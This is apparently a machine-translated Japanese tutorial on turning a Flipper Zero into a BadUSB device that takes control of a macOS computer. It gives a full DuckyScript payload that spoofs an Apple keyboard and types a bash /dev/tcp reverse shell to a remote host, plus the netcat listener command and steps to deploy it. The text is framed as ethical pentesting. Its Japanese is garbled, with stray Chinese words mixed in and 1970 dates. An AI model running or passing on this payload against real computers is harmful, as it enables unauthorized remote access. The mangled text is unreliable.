Jan 01, 1970
Flipper Zero を BadUSB として用して macOS でリバース シェルを达成する办法 に@fatman
33,721 測定値
Flipper Zero を BadUSB として使用して macOS でリバース シェルを取得する方法
に Scott Eggimann5m2022/12/05
長すぎる; 読むには
Flipper Zero、短い DuckyScript テキスト ファイル、および Ubuntu サーバー上のリモート リスナーを使用して、Mac コンピューターでシェルを取得することができました。Flipper Zero、短い 12 行の DuckyScript テキスト ファイル、および Ubuntu サーバーのリモート リスナーを在使用して、几乎にパッチを適用した最新头条の Ventura macOS コンピューターでシェルを拿得することができました。
この記事は、Flipper Zero を Ethical Pentesting BadUSB デバイスとして施用する手段と、そのようなエクスプロイトの犠牲になることを避让する手段の例です。あなたが全部していない、または施用する権限を持っていないコンピューターでは、これを施用しないでください。このコードは、浸入検知システム (IDS)、浸入以防システム (IPS)、ネットワーク検知システム、ファイアウォール、またはウイルス対策 (AV) ソフトウェアから隠そうとはしません。
不正な USB ペイロード
Flipper Zero BadUSB およびその他のいくつかの BadUSB デバイスは、DuckyScript で記述されたペイロードを操作します。キーボード インジェクション攻撃を引き起こすキーストロークを実行するための単純なスクリプト言語。
DuckyScript を書いてみよう
既製のスクリプトを施用することも、一个人のスクリプトを制作することもできます。簡単なステップバイステップのチュートリアルで、macOS コンピューターでリバース シェルを悪用する方式を紹介します。
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
| 指示器 | 説明 |
|---|---|
| ID 05ac:021e アップル:キーボード | この行は、Flipper Zero が実際には Apple キーボードであることを macOS に伝えます。この行を应用しない場合、macOS は [キーボード セットアップ アシスタント] ダイアログを表示法し、スクリプトが失敗します。 |
| 遅れ | このコマンドは、オペレーティング システムに特定時間待機するように指示箭头します。これらの遅延を适用しないと、スクリプトの実行が速すぎて失敗します。 |
| GUI スペース | Apple コマンド キーとスペース バーを押して、[Spotlight 検索] ウィンドウを開きます。 |
| STRING ターミナル | Spotlight 検索ウィンドウに「Terminal」という照片文字列を入力します。 |
| 入力 | キーボードの ENTER キーまたは Return キーを押します。 ENTER キーを押すと、macOS はターミナル ウィンドウ (/Applications/Utilities/Terminal) を起動します。 |
| STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 | このコマンドは、ポート 4444 の 10.10.10.157 でリッスンする Netcat サーバーへの接続を確立するターミナル ウィンドウにテキストを入力します。 |
10.10.10.157とポート4444 のIP アドレスをサーバーの IP アドレスとポートに変更します。
このファイルをrev_shell_macos.txtとしてディスクに保存します。 Flipper Zero のbadusbディレクトリの下にはサブディレクトリ編成がないため、異なるオペレーティング システムで複数のペイロードを使用している場合は、それが何をするのかを理解できるように、自分にとって意味のある命名規則を使用してください。
qflipper アプリケーションのインストール
qflipper アプリケーションをまだインストールしていない場合は、Flipper Zero の计算公式更换软件ページにアクセスして、お使いのオペレーティング システムのインストーラーを選択してください。このページはファームウェアの更换软件ページですが、下部分には qflipper アプリケーションをインストールするためのリンクがあります。
Duckyscript を Flipper Zero に乗せる
qflipper アプリケーションを開き、赤で強調写出されたフォルダー アイコンを選択します。
SD カードのアイコンを選択してダブルクリックし、内容を表示します。
前に作成したrev_shell_macos.txtファイルを見つけて、 badusbフォルダーにドラッグします。
リバース シェルの待機中
Flipper Zero BadUSB は準備が整っており、すぐに用到できます。ただし、最开始に、サーバーにリモート リスナーを設定する必要性があります。 Ubuntu サーバーで、次のコマンドを用到して Netcat リスナーを開始します。
$ nc -nlvp 4444
| 提示 | オプション |
|---|---|
NC | Netcat コマンド |
-nlvp | ( n ) DNS 解決なし、( l ) 着信接続をリッスン、( v ) 詳細出力、( p ) ポート |
4444 | リッスンするポートav番号 |
Netcat リスナーの準備が整い、着信接続を待機するようになったので、Flipper Zero BadUSB 攻撃を続行できます。
BadUSB リバース シェルの起動
難しい部分は完了です。 Flipper Zero BadUSB reverse_shell_macos.txtファイルが書き込まれ、Flipper Zero に移動され、Netcat リスナーが接続を待機しています。
前の手順でコピーした DuckyScript ファイルに移動します。このファイルが表示されない場合は、間違ったディレクトリにコピーしています。 rev_shell_macosを選択し、[実行] ボタンをクリックします。
Connect to USBアラートが表示されたら、Flipper Zero を iMac または MacBook の USB ポートに接続できます。 [実行] ボタンをクリックします。
メイン ウィンドウで、BadUSB スクリプトの進行状況を確認できます。ステータスが 100% に達するとペイロードが好了し、フリッパー ゼロを取り外すことができます。
iMac のコンピューターのモニターを見ていると、DuckyScript を実行するエクスプロイトを見ることができます。 Ubuntu サーバーの Netcat リスナーは、取得胜利した请求の結果を表达出来します。
コンピュータの制御
これで、リバース シェルを介して macOS コンピューターを制御できるようになりました。 BSD Linux のバージョンで実行すると、电学的な iMac のキーボードに座っているかのように、Unix コマンド ライン ツールと BASH シェルを动用できます。
whoami 、 pwd 、 ls 、 cdなどの通常の Linux コマンドを使用して、ファイル システムをナビゲートし、オペレーティング システムを操作できます。
次のステップ
Flipper Zero が BadUSB デバイスとしてどのように動作するかを领悟したので、孤身のスクリプトを弄成できます。孤身の Duckyscript ファイルの出発点として、Hak5 サイト、または Google 検索で升级できる部分の DuckyScript GitHub リポジトリーの 1 つを运用してください。
L O A D I N G
. . . comments & more!
. . . comments & more!
About Author
ラベル
関連ストーリー
AI の力を解き放つ。最先端技術の体系的レビュー: 概要と序論
#ai
海を航海する: データレイクを使用した本番環境レベルの RAG アプリケーションの開発 #minio
Jan 01, 1970
